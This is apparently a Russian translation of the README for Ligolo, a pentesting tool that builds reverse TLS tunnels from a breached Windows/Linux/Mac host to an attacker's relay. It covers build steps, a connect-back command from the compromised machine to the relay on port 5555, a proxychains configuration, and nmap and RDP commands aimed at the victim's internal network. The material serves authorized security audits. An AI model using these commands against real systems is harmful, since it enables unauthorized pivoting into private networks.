
Обратное туннелирование, упрощённое для пентестеров и созданное пентестерами https://sysdream.com/

Ligolo — это простой и лёгкий инструмент для создания SOCKS5 или TCP туннелей из обратного соединения с полной безопасностью (TLS-сертификат с эллиптической кривой).
Он сравним с Meterpreter в связке с Autoroute + Socks4a, но более стабилен и быстрее.
Вы взломали сервер Windows / Linux / Mac в ходе внешнего аудита. Этот сервер находится внутри локальной сети, и вы хотите установить соединения с другими машинами в этой сети.
Ligolo может настроить туннель для доступа к ресурсам внутреннего сервера.
Ретрансляция RDP-соединения с использованием Proxychains (WAN).

Ниже приведён скриншот теста скорости между двумя хостами на 100 Мбит/с (ligolo / localrelay). Производительность может варьироваться в зависимости от системы и сетевой конфигурации.

Убедитесь, что Go установлен и работает.
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
make certs TLS_HOST=example.com
ПРИМЕЧАНИЕ: Вы также можете использовать собственные сертификаты, указав параметр TLS_CERT при вызове build. Пример: make build-all TLS_CERT=certs/mycert.pem.
make build-all
make build
Ligolo состоит из двух модулей:
Localrelay предназначен для запуска на управляющем сервере (сервере атакующего).
Ligolo — это программа, запускаемая на целевом компьютере.
Для localrelay можно оставить параметры по умолчанию. Он будет прослушивать все интерфейсы на порту 5555 и ожидать подключений от ligolo (параметр -relayserver).
Для ligolo необходимо указать IP-адрес ретрансляционного сервера (или вашего сервера атакующего) с помощью параметра -relayserver ip:port.
Для справки используйте опцию -h.
После установления соединения между Ligolo и LocalRelay на ретрансляционном сервере будет настроен SOCKS5-прокси на TCP-порту 1080 (вы можете изменить TCP-адрес/порт с помощью опции -localserver).
После этого всё, что вам нужно сделать, — это использовать ваш любимый инструмент (например, Proxychains) и исследовать локальную сеть клиента.
На вашем сервере атакующего:
./bin/localrelay_linux_amd64
На взломанном хосте:
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
После установления соединения укажите следующие параметры в файле конфигурации ProxyChains (на сервере атакующего):
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
Пользуйтесь.
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123
Параметры Localrelay:
Usage of localrelay:
-certfile string
The TLS server certificate (default "certs/server.crt")
-keyfile string
The TLS server key (default "certs/server.key")
-localserver string
The local server address (your proxychains parameter) (default "127.0.0.1:1080")
-relayserver string
The relay server listening address (the connect-back address) (default "0.0.0.0:5555")
Параметры Ligolo:
Usage of ligolo:
-autorestart
Attempt to reconnect in case of an exception
-relayserver string
The relay server (the connect-back address) (default "127.0.0.1:5555")
-skipverify
Skip TLS certificate pinning verification
-targetserver string
The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server
GNU General Public License v3.0 (см. LICENSING).